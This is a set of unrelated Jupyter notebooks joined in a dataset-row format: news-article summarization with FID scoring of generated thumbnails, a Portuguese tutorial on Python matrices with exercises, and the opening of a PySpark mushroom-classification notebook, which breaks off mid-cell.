'imFFT442'\n 'imFFT453' 'imFFT456' 'imFFT458' 'imFFT461' 'imFFT428' 'imFFT460'\n 'imFFT451' 'imFFT416' 'imFFT463' 'imFFT418' 'imFFT435' 'imFFT454'\n 'imFFT452' 'imFFT419' 'imFFT431' 'imFFT457' 'imFFT417' 'imFFT425'\n 'imFFT439' 'imFFT404' 'imFFT455' 'imFFT440' 'imFFT229' 'imFFT434'\n 'imFFT450' 'imFFT464' 'imFFT369' 'imFFT459' 'imFFT462' 'imFFT230'\n 'imFFT231' 'imFFT232' 'imFFT233' 'imFFT234' 'imFFT235' 'imFFT236'\n 'imFFT237' 'imFFT238' 'imFFT239' 'imFFT240' 'imFFT241' 'imFFT242'\n 'imFFT243' 'imFFT244' 'imFFT245' 'imFFT246' 'imFFT247' 'imFFT248'\n 'imFFT364' 'imFFT368' 'imFFT249' 'imFFT250' 'imFFT251' 'imFFT252'\n 'imFFT253' 'imFFT254' 'imFFT255' 'imFFT256' 'imFFT257' 'imFFT258'\n 'imFFT259' 'imFFT260' 'imFFT261' 'imFFT262' 'imFFT263' 'imFFT465'\n 'imFFT265' 'imFFT367' 'reFFT159' 'var' 'imFFT366' 'reFFT049' 'reFFT069'\n 'reFFT111' 'reFFT072' 'reFFT143' 'reFFT088' 'reFFT146' 'reFFT060'\n 'meanabsslp' 'reFFT134' 'reFFT121' 'reFFT118' 'reFFT079' 'reFFT082'\n 'reFFT104' 'reFFT117' 'reFFT147' 'reFFT090' 'reFFT114' 'reFFT153'\n 'reFFT144' 'reFFT091' 'reFFT085' 'reFFT097' 'reFFT135' 'reFFT133'\n 'reFFT127' 'reFFT105' 'reFFT123' 'reFFT137' 'reFFT141' 'reFFT095'\n 'reFFT152' 'reFFT107' 'reFFT102' 'reFFT098' 'reFFT100' 'reFFT116'\n 'reFFT076' 'reFFT067' 'reFFT065' 'reFFT140' 'reFFT063' 'reFFT075'\n 'reFFT055' 'reFFT084' 'reFFT139' 'reFFT126' 'reFFT101' 'reFFT071'\n 'reFFT092' 'reFFT150' 'reFFT115' 'reFFT078' 'reFFT066' 'reFFT151'\n 'reFFT086' 'reFFT138' 'reFFT136' 'reFFT120' 'reFFT070' 'reFFT130'\n 'reFFT042' 'reFFT109' 'reFFT036' 'reFFT128' 'reFFT099' 'reFFT108'\n 'reFFT125' 'reFFT094' 'reFFT142' 'reFFT106' 'reFFT083' 'reFFT131'\n 'reFFT149' 'reFFT062' 'reFFT132' 'reFFT124' 'reFFT074' 'reFFT096'\n 'reFFT089' 'reFFT081' 'reFFT103' 'reFFT093' 'reFFT057' 'reFFT059'\n 'reFFT077' 'reFFT061' 'reFFT047' 'reFFT145' 'reFFT046' 'reFFT119'\n 'reFFT058' 'reFFT073' 'reFFT050' 'reFFT148' 'reFFT064' 'reFFT129'\n 'reFFT080' 'reFFT113' 'reFFT122' 'reFFT112' 'reFFT087' 'reFFT033'\n 'reFFT068' 'reFFT054' 'reFFT056' 'reFFT048' 'reFFT032' 'reFFT051'\n 'reFFT110' 'reFFT053' 'reFFT045' 'reFFT034' 'reFFT037' 'reFFT052'\n 'reFFT044' 'reFFT035' 'reFFT040' 'reFFT039' 'reFFT038' 'reFFT031'\n 'reFFT041' 'reFFT043' 'reFFT160' 'arco2' 'arco3' 'shist2' 'arco1' 'mdf'\n 'mnf' 'mmnf' 'mmdf' 'reFFT005' 'reFFT002' 'reFFT003' 'reFFT001' 'shist1'\n 'reFFT007' 'shist3' 'reFFT004' 'reFFT008' 'ssc' 'reFFT012' 'reFFT009'\n 'wamp' 'reFFT000' 'reFFT014' 'reFFT010' 'reFFT006' 'reFFT011' 'reFFT017'\n 'reFFT013' 'reFFT021' 'reFFT019' 'reFFT016' 'reFFT015' 'reFFT024'\n 'reFFT026' 'reFFT018' 'reFFT020' 'reFFT023' 'reFFT028' 'reFFT022'\n 'reFFT027' 'rms' 'reFFT030' 'reFFT025' 'reFFT029' 'wavl' 'rng']\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e707bca278c707fd6c676be691c91fd04116c87f | 26,421 | ipynb | Jupyter Notebook | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | post_process.ipynb | DeepTitan/thumbnails | 3c0ce261e7b040dd9ee9cf93f1460cf52a6a1f28 | [
"MIT"
] | null | null | null | 49.850943 | 1,486 | 0.604178 | [
[
[
"import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nimport json\nimport os\n\n#data = json.load(open('/Volumes/Elements/236_data/origin/data.json'))\nbase = '/Volumes/Elements/236_data/origin/'\n\n\nfrom transformers import pipeline",
"_____no_output_____"
],
[
"summarizer = pipeline(\"summarization\")\n",
"No model was supplied, defaulted to sshleifer/distilbart-cnn-12-6 (https://huggingface.co/sshleifer/distilbart-cnn-12-6)\n"
],
[
"#find data where 'id' = 107629\nfor i in range(len(data)):\n if data[i]['id'] == 107629:\n print(data[i])\n break",
"{'id': 107629, 'caption': 'Marissa Mayer poses at Google s Mountain View California headquarters in this February 24 2009 file photo', 'topic': 'arts_culture', 'source': 'washington_post', 'image_path': './washington_post/images/0418/478.jpg', 'article_path': './washington_post/articles/107629.txt'}\n"
],
[
"text = \"\"\"For four long years members of the US Congress had to smile or scowl as a TV star played the role of president.\n\nDonald Trump became infamous for the art of lying. On Wednesday another TV performer turned national leader came before Congress. But this one captivated his viewers with truth telling.\n\nThe Ukrainian president, Volodymyr Zelenskiy, a former actor and comedian facing down the Russian war machine, has an instinctive understanding of the camera but is proving a more serious man for more serious times.\n\nDespite being under siege in Kyiv, Zelenskiy has been on a virtual tour of western capitals over the past three weeks, tailoring his speeches to each nation. Speaking virtually to the British parliament, he cited William Shakespeare and Winston Churchill, while he asked members of its Canadian equivalent to imagine waking at 4am to bombs dropping on Ottawa’s airport or Toronto’s CN Tower.\n\nThe Axios website described it as a “signature blend of praising, chastising and pleading with his audience to understand the global stakes of Ukraine’s resistance” which has produced unexpected commitments such as oil and Swift banking sanctions.\n\nSo it was that in a packed auditorium in the basement of the US Capitol in Washington, Zelenskiy, whose words were translated from Ukrainian into English by a female interpreter, conjured the demons of two days when America was attacked from the skies to renew his plea for a no-fly zone above Ukraine.\n\n“Remember Pearl Harbor, the terrible morning of December 7, 1941, when your sky was black from the planes attacking you,” said Zelenskiy, looming large on a cinema screen, wearing perfectly trimmed hair and beard and a green T-shirt, against a white backdrop with a Ukrainian flag to one side.\n\n“Remember September 11, a terrible day in 2001 when evil tried to turn your cities, independent territories, into battlefields. When innocent people were attacked from the air. Our country is experiencing the same every day, right now, at this moment. Every night for three weeks now … Russia has turned the Ukrainian sky into a source of death for thousands of people.”\n\nCombined with references to Mount Rushmore and Martin Luther King’s “I have a dream speech”, Zelenskiy, was pushing America’s most emotive buttons with words. But he also knows that this is the nation of network television, cable news, Hollywood, Netflix and social media. So words alone would not do.\n\nZelenskiy asked the members of the House of Representatives and Senate to watch a searing video compilation showing the hell that Russian troops have rained down on Ukraine and its citizens. It contrasted idyllic images of children playing in peaceful towns and cities with explosions, destruction, sobbing, refugees, hospitals and corpses, accompanied by the lament of a violin.\n\nAccording to a pooled report by the Associated Press, “As Zelenskiy played the video of violence, the room was very quiet and members were mostly still. Some shook their heads or wiped eyes or took video. Small amount of applause afterward.”\n\nThen came a simple message written in white letters on a black backdrop: “Close the sky over Ukraine.”\n\nTragic in the truest sense because this is the one thing that Congress, and Joe Biden, will not do, fearing that a no-fly zone, in which US pilots shoot down Russians, could trigger a third world war. Perhaps aware of this reluctance, Zelenskiy did not dwell on the issue for long, pivoting to a request for surface-to-air missile systems and urging Washington to “do more”.\n\nBut the video had a wider purpose. It was shown to millions of American TV viewers just after 9am. It caught TV executives by surprise and they did not have time to censor it; some anchors apologised for its graphic content. It spread far and wide on social media. In the court of public opinion, the video humanised the victims and conveyed the message that our struggle is your struggle.\n\nZelenskiy had again shown himself to be a master of the medium, inviting comparisons with Vladimir Putin’s efforts to lie low, clamp down on media, crush all dissent and turn Russia into North Korea. Zelenskiy is running rings around Putin in the soft power arena with his speeches and intimate phone videos; Russia is not faring especially well with hard power either.\n\nOn Wednesday the Ukrainian president ended his speech by addressing the room in English. “Now, I’m almost 45 years old,” he said. “Today my age stopped when the heart of more than 100 children stopped beating. I see no sense in life if it cannot stop the deaths.”\n\nThere was also a direct appeal to Biden: “I wish for you to be the leader of the world. Being the leader of the world means to be the leader of peace.”\n\nThe auditorium erupted in a bipartisan standing ovation. Chris Murphy, a Democratic senator, tweeted: “There’s no member of Congress left that room without thinking what more the United States can do to stop this carnage. Just a gut wrenching speech. #SlavaUkraine.”\n\nIn an era of Trumpism, fake news and disinformation, Zelenskiy, who used to play a fictional president, had cut through with his sincerity. For him and Ukraine, it already feels like a third world war; that is their truth. And the temptation for America to flex its superpower muscles is stronger than ever.\n\nTragic in the truest sense because this is the one thing that Congress, and Joe Biden, will not do, fearing that a no-fly zone, in which US pilots shoot down Russians, could trigger a third world war. Perhaps aware of this reluctance, Zelenskiy did not dwell on the issue for long, pivoting to a request for surface-to-air missile systems and urging Washington to “do more”.\n\nBut the video had a wider purpose. It was shown to millions of American TV viewers just after 9am. It caught TV executives by surprise and they did not have time to censor it; some anchors apologised for its graphic content. It spread far and wide on social media. In the court of public opinion, the video humanised the victims and conveyed the message that our struggle is your struggle.\n\nZelenskiy had again shown himself to be a master of the medium, inviting comparisons with Vladimir Putin’s efforts to lie low, clamp down on media, crush all dissent and turn Russia into North Korea. Zelenskiy is running rings around Putin in the soft power arena with his speeches and intimate phone videos; Russia is not faring especially well with hard power either.\n\nOn Wednesday the Ukrainian president ended his speech by addressing the room in English. “Now, I’m almost 45 years old,” he said. “Today my age stopped when the heart of more than 100 children stopped beating. I see no sense in life if it cannot stop the deaths.”\n\nThere was also a direct appeal to Biden\"\"\"\n\n\nsummarizer(text)",
"_____no_output_____"
],
[
"def summarized_docs(ids):\n summaries = {}\n for id in tqdm(ids):\n #find data with id\n art_path = None\n caption = None\n for d in data:\n if d['id'] == id:\n art_path = base + d['article_path'][2:]\n caption = d['caption']\n print(art_path)\n break\n #print article \n with open(art_path, 'r') as f:\n art = f.read()\n #split into words\n art = art.split()\n #take first 700 words\n art = art[:500]\n #join words\n art = ' '.join(art)\n print(len(art))\n\n text = summarizer(art, min_length=5, max_length=50)[0]['summary_text']\n #add to dict\n summaries[id] = {'caption': caption, 'summary': text}\n print(text)\n\n return summaries\n",
"_____no_output_____"
],
[
"#pick 128 random images from the ./test folder\nrandom_imgs = np.random.choice(os.listdir('./test'), 128, replace=False)\n#remove the .jpg extension from the images\nrandom_imgs = [img[:-4] for img in random_imgs]\n#convert to list of ints\nrandom_imgs = [int(img) for img in random_imgs]\nsummaries = summarized_docs(random_imgs)\n\n#save to json\nwith open('./test_summaries.json', 'w') as f:\n json.dump(summaries, f)\n",
"_____no_output_____"
],
[
"!pwd",
"huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...\nTo disable this warning, you can either:\n\t- Avoid using `tokenizers` before the fork if possible\n\t- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)\n/Users/isaiahwilliams/thumbnail\n"
],
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\nfake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\nfake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\n\nfor i in range (1, len(os.listdir(fake_summ_ft_path))):\n #get os list files only\n fake_summ_ft_files = os.listdir(fake_summ_ft_path)\n fake_summ_ft_files = [f for f in fake_summ_ft_files if os.path.isfile(fake_summ_ft_path + f)]\n folder_name = fake_summ_ft_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_summ_ft_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_summ_ft_files:\n if folder_name in f:\n os.rename(fake_summ_ft_path + f, fake_summ_ft_path + folder_name + '/' + f)\n \n ########################################################################################################################\n fake_caption_ft_files = os.listdir(fake_caption_ft_path)\n fake_caption_ft_files = [f for f in fake_caption_ft_files if os.path.isfile(fake_caption_ft_path + f)]\n folder_name = fake_caption_ft_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_caption_ft_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_caption_ft_files:\n if folder_name in f:\n os.rename(fake_caption_ft_path + f, fake_caption_ft_path + folder_name + '/' + f)\n\n\n ########################################################################################################################\n fake_summ_base_files = os.listdir(fake_summ_base_path)\n fake_summ_base_files = [f for f in fake_summ_base_files if os.path.isfile(fake_summ_base_path + f)]\n folder_name = fake_summ_base_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_summ_base_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_summ_base_files:\n if folder_name in f:\n os.rename(fake_summ_base_path + f, fake_summ_base_path + folder_name + '/' + f)\n\n\n ########################################################################################################################\n fake_caption_base_files = os.listdir(fake_caption_base_path)\n fake_caption_base_files = [f for f in fake_caption_base_files if os.path.isfile(fake_caption_base_path + f)]\n folder_name = fake_caption_base_files[0].split('_')[0][2:]\n #make folder of folder name\n os.mkdir(fake_caption_base_path + folder_name)\n #move all files containing folder name to folder\n for f in fake_caption_base_files:\n if folder_name in f:\n os.rename(fake_caption_base_path + f, fake_caption_base_path + folder_name + '/' + f)\n\n\n###THIS RETURNS AN ERROR BUT STILL WORKS WITH ZIP FILE\n\n",
"_____no_output_____"
],
[
"#find data where id = '111268'\n\nfor ",
"_____no_output_____"
],
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfrom tqdm import tqdm\nfor path in tqdm(os.listdir(fake_summ_ft_path)):\n #get os list files only\n if os.path.isdir(fake_summ_ft_path + path):\n #print(path)\n id = path\n real_img_path = '/Users/isaiahwilliams/thumbnail/test/' + str(id) + '.jpg'\n new_dest = '/Users/isaiahwilliams/thumbnail/real/' + str(id) + '.jpg'\n !cp '{real_img_path}' '{new_dest}'",
"100%|██████████| 113/113 [00:14<00:00, 7.64it/s]\n"
],
[
"for i in range(len(data)):\n if data[i]['id'] == id:\n print(data[i])\n break",
"{'id': 107629, 'caption': 'Marissa Mayer poses at Google s Mountain View California headquarters in this February 24 2009 file photo', 'topic': 'arts_culture', 'source': 'washington_post', 'image_path': './washington_post/images/0418/478.jpg', 'article_path': './washington_post/articles/107629.txt'}\n"
],
[
"#loop through all files in test_f and put them in their own folder\nfor filename in os.listdir('./test_f'):\n #make folder with filename\n folder_name = filename[:-4]\n os.mkdir('./test_f/' + folder_name)\n #move file into folder\n os.rename('./test_f/' + filename, './test_f/' + folder_name + '/' + filename)\n",
"_____no_output_____"
],
[
"#loop through all files in test_f and duplicate them 3 tiems\nimport shutil\nfor filename in os.listdir('./test_f'):\n #check if filename is a folder\n #chec kif filename is an int\n if os.path.isdir('./test_f/' + filename) and filename.isdigit():\n for filename2 in os.listdir('./test_f/' + filename):\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_2.jpg')\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_3.jpg')\n shutil.copy('./test_f/' + filename + '/' + filename2, './test_f/' + filename + '/' + filename2[:-4] + '_4.jpg')\n \n ",
"_____no_output_____"
],
[
"#loop through all files in test_f and duplicate them 3 tiems\nimport shutil\nfor filename in os.listdir('./test_f'):\n #check if filename is a folder\n #chec kif filename is an int\n if os.path.isdir('./test_f/' + filename) and filename.isdigit():\n #remove all files that are not jpg\n for filename2 in os.listdir('./test_f/' + filename):\n if filename2[-4:] != '.jpg':\n os.remove('./test_f/' + filename + '/' + filename2)",
"_____no_output_____"
]
],
[
[
"## RUN THIS TO GET FID SCORES ON DATA\n",
"_____no_output_____"
]
],
[
[
"fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\nfake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\nfake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\nfake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\nreal_path = '/Users/isaiahwilliams/thumbnail/real/'\n\n!python -m pytorch_fid $fake_summ_ft_path $real_path\n!python -m pytorch_fid $fake_caption_ft_path $real_path\n!python -m pytorch_fid $fake_summ_base_path $real_path\n!python -m pytorch_fid $fake_caption_base_path $real_path\n\n\n\n\n \n",
"100%|█████████████████████████████████████████████| 9/9 [02:00<00:00, 13.38s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:35<00:00, 11.99s/it]\nFID: 179.1055763799293\n100%|█████████████████████████████████████████████| 9/9 [02:00<00:00, 13.41s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.17s/it]\nFID: 175.01754727685386\n100%|█████████████████████████████████████████████| 9/9 [02:07<00:00, 14.15s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.15s/it]\nFID: 307.83396283686074\n100%|█████████████████████████████████████████████| 9/9 [02:01<00:00, 13.46s/it]\n100%|█████████████████████████████████████████████| 3/3 [00:36<00:00, 12.07s/it]\nFID: 311.18955829185677\n"
],
[
"# fake_summ_ft_path = '/Users/isaiahwilliams/thumbnail/fake/summary/ft/'\n# fake_caption_ft_path = '/Users/isaiahwilliams/thumbnail/fake/caption/ft/'\n# fake_summ_base_path = '/Users/isaiahwilliams/thumbnail/fake/summary/base/'\n# fake_caption_base_path = '/Users/isaiahwilliams/thumbnail/fake/caption/base/'\n# real_path = '/Users/isaiahwilliams/thumbnail/real/'\n\n# files = []\n# #loop through all files in fake_summ_ft_path\n# for filename in os.listdir(fake_summ_ft_path):\n# filename_cf = fake_caption_ft_path + filename.replace('sf', 'cf')\n# filename_sb = fake_summ_base_path + filename.replace('sf', 'sb')\n# filename_cb = fake_caption_base_path + filename.replace('sf', 'cb')\n# filename_real = real_path + filename.split('_')[0][2:] + '.jpg'\n# filename_sf = fake_summ_ft_path + filename\n# files.extend([filename_cf, filename_sb, filename_cb, filename_real, filename_sf])\n\n# #check if file is a file\n\n# #loop through all files in files",
"_____no_output_____"
],
[
"# for path in os.listdir('/Users/isaiahwilliams/thumbnail/fake/'):\n# if os.path.isdir('/Users/isaiahwilliams/thumbnail/fake/' + path):\n# for filename in os.listdir('/Users/isaiahwilliams/thumbnail/fake/' + path):\n# if os.path.isdir('/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename):\n# for filename2 in os.listdir('/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename):\n# full_path = '/Users/isaiahwilliams/thumbnail/fake/' + path + '/' + filename + '/' + filename2\n# #split on '_'\n# number = int(filename2.split('_')[1][:-4])\n# #if number is greater than 3 then delete\n# if number > 3:\n# os.remove(full_path)\n\n# if full_path not in files:\n# os.remove(full_path)\n# print(full_path)\n\n# for path in os.listdir('/Users/isaiahwilliams/thumbnail/real'):\n# full_path = '/Users/isaiahwilliams/thumbnail/real/' + path\n# if full_path not in files:\n# os.remove(full_path)\n# print(full_path)\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e707c3589a5ae3b213ff401d124ff018b82bb2aa | 11,133 | ipynb | Jupyter Notebook | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | Fontes-UDF/programming/Matriz.ipynb | IgorWinMac/UDF-Material | 96f544f4a7399360f3855f3d082a6cea8f787dd0 | [
"MIT"
] | null | null | null | 20.616667 | 203 | 0.469415 | [
[
[
"# Matrizes",
"_____no_output_____"
],
[
"## Introdução",
"_____no_output_____"
],
[
"Matrizes são estruturas largamente utilizadas na computação e em áreas como Estatística. São, basicamente, vetor de duas dimensões, no qual um valor é localizado por dois índices:",
"_____no_output_____"
]
],
[
[
"linha1 = [\"A\", \"B\", \"C\"]\nlinha2 = [\"D\", \"E\", \"F\"]\n\nmatriz = [linha1, linha2]\n\nprint(matriz[0][1]) # segundo valor da primeira linha\nprint(matriz[1][2]) # terceiro valor da segunda linha\n",
"_____no_output_____"
]
],
[
[
"Uma matriz pode ser a representação de uma tabela de valores. Veja um exemplo:\n\nVendas de Produtos/Quinzena\n\n| | 1a Quinzena | 2a Quinzena | 3a Quinzena |\n|----------|:-------------:|------:|------:\n| Prod1 | 100 | 15 | 40 |\n| Prod2 | 200 | 30 | 80 |\n| Prod3 | 40 | 120 | 60 |\n",
"_____no_output_____"
],
[
"A matriz que representa essa tabela é composta por 3 linhas e colunas:\n\n```\n 100 15 40\n 200 30 80\n 40 120 60\n\n```",
"_____no_output_____"
],
[
"E em uma linguagem como Python, essa matriz pode ser representada da seguinte forma:",
"_____no_output_____"
]
],
[
[
"vendas = [[100,15,40],[200,30,80],[40,120,60]]\n\nfor linha in vendas:\n for coluna in linha:\n print(coluna)\n \nfor i in range(len(vendas)):\n for j in range(len(vendas[i])):\n print(vendas[i][j])\n",
"100\n15\n40\n200\n30\n80\n40\n120\n60\n100\n15\n40\n200\n30\n80\n40\n120\n60\n"
]
],
[
[
"## Posições em uma matriz",
"_____no_output_____"
],
[
"Como em um vetor, as posições da linha e coluna começam no número zero. Veja a matriz abaixo:\n\n```\n 100 15 40\n 200 30 80\n 40 120 60\n\n```",
"_____no_output_____"
],
[
"- A posição do valor 100 é 0,0\n- A posição do valor 120 é 2,1\n- A posição do valor 40 é 0,2",
"_____no_output_____"
],
[
"## Inicializando uma matriz",
"_____no_output_____"
],
[
"**Manualmente**",
"_____no_output_____"
]
],
[
[
"matriz = [[0,0,0],[0,0,0]]",
"_____no_output_____"
]
],
[
[
"**Usando uma estrutura de repetição**",
"_____no_output_____"
]
],
[
[
"a = [0]*3\nfor i in range(3):\n a[i] = [0]*3\nprint(a)",
"[[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n"
]
],
[
[
"## Acessando valores de uma matriz",
"_____no_output_____"
],
[
"É feita como em um vetor, com a diferença que são necessários dois índices para se acessar uma posição:\n\n```\nA B C\nD E F\nG H I\n\n```",
"_____no_output_____"
],
[
"Na matriz acima, o valor F está na segunda linha e terceira coluna. Veja em Python:",
"_____no_output_____"
]
],
[
[
"matriz = [[\"A\",\"B\",\"C\"],[\"D\",\"E\",\"F\"],[\"G\",\"H\",\"I\"]]\nprint(matriz[1][2])",
"F\n"
]
],
[
[
"## Alterando valores de uma matriz",
"_____no_output_____"
],
[
"A operação de alteração é feita como no vetor, dessa vez com dois índices:",
"_____no_output_____"
]
],
[
[
"matriz = [[\"A\",\"B\",\"C\"],[\"D\",\"E\",\"F\"],[\"G\",\"H\",\"I\"]]\nprint(\"2a linha, 3a coluna:\", matriz[1][2])\nmatriz[1][2] = \"T\"\n\n# Note que o valor F será trocado pelo T\n\nprint(matriz)",
"2a linha, 3a coluna: F\n[['A', 'B', 'C'], ['D', 'E', 'T'], ['G', 'H', 'I']]\n"
]
],
[
[
"## Imprimir uma matriz inteira",
"_____no_output_____"
],
[
"Considere a matriz abaixo:",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\n\nfor linha in vendas:\n imprimir = \"\"\n for coluna in linha:\n imprimir += str(coluna) + \" \"\n print(imprimir)\n",
"Produto 1 100 15 40 \nProduto 2 200 30 80 \nProduto 3 40 120 60 \n"
]
],
[
[
"## Imprimir uma linha da matriz",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\nprint(vendas[0])",
"['Produto 1', 100, 15, 40]\n"
]
],
[
[
"## Imprimindo uma coluna da matriz",
"_____no_output_____"
],
[
"Bibliotecas como Numpy trazem a facilidade de operar uma matriz mas, supondo a ausência de bibliotecas como essa, deve-se percorrer cada linha e selecionar a coluna desejada:",
"_____no_output_____"
]
],
[
[
"vendas = [[\"Produto 1\", 100,15,40],[\"Produto 2\", 200,30,80],[\"Produto 3\",40,120,60]]\ncol = 1\nfor linha in vendas:\n print(linha[col])",
"100\n200\n40\n"
]
],
[
[
"## Exercícios",
"_____no_output_____"
],
[
"**Ex 1: Crie uma matriz 3x4, todas as posições com o valor 1 **",
"_____no_output_____"
],
[
"** Ex 2: Dada a matriz abaixo, multiplique todos os valores por 2 e grave-os na mesma matriz**",
"_____no_output_____"
]
],
[
[
"m = [[1,2,3],[4,3,2],[9,4,3]]",
"_____no_output_____"
]
],
[
[
"** Ex 3: Usando a mesma matriz do exercício anterior, faça um programa que peça ao usuário dois números x e y. Seu programa deverá dizer qual número está na posição x,y da matriz.**",
"_____no_output_____"
],
[
"**Ex 4: Considere a tabela de vendas abaixo. Calcule o total de vendas por produto. **\n\n| | 1a Quinzena | 2a Quinzena | 3a Quinzena |\n|----------|:-------------:|------:|------:\n| Prod1 | 100 | 15 | 40 |\n| Prod2 | 200 | 30 | 80 |\n| Prod3 | 40 | 120 | 60 |",
"_____no_output_____"
],
[
"**Ex 5: Dadas as duas matrizez abaixo, crie um código que faça a soma das duas matrizes, gravando em uma terceira matriz**",
"_____no_output_____"
]
],
[
[
"matriz1 = [[3,2,6],[4,8,9],[2,5,0]]\nmatriz2 = [[2,6,8],[2,3,4],[6,8,1]]",
"_____no_output_____"
]
],
[
[
"** Ex 6: Faça um programa que peça ao usuário que digite dois números A e B. Gere uma matriz com dimensões A X B onde cada posição da matriz será preenchida por um número aleatório entre 1 e 100 **",
"_____no_output_____"
],
[
"** Ex 7: Usando a mesma matriz do exercício anterior, calcule a soma dos elementos da matriz **",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
e707c99edd768737b884002b766ebe721c399fd1 | 15,417 | ipynb | Jupyter Notebook | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | 40.893899 | 1,420 | 0.637673 | [
[
[
"from pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.classification import LinearSVC, RandomForestClassifier\nfrom pyspark.ml.feature import IndexToString, Normalizer, StringIndexer, VectorAssembler, VectorIndexer\nfrom pyspark.ml.pipeline import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql.types import BooleanType\nfrom pyspark.mllib.evaluation import MulticlassMetrics\nfrom helpers.helper_functions import translate_to_file_string\nfrom pyspark.ml.classification import LinearSVC\nimport pandas as pd\nimport numpy as np\n\n# for pretty printing\ndef printDf(sprkDF): \n newdf = sprkDF.toPandas()\n from IPython.display import display, HTML\n return HTML(newdf.to_html())",
"_____no_output_____"
],
[
"inputFile = \"hdfs:///data/mushrooms.csv\"",
"_____no_output_____"
],
[
"spark = (SparkSession\n .builder\n .master(\"yarn\")\n .appName(\"Mushroom/Classification\")\n .getOrCreate())",
"_____no_output_____"
],
[
"df = spark.read.option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .option(\"delimiter\", \",\") \\\n .csv(inputFile)",
"_____no_output_____"
]
],
[
[
"# String- Werte in numerische Werte umwandeln",
"_____no_output_____"
]
],
[
[
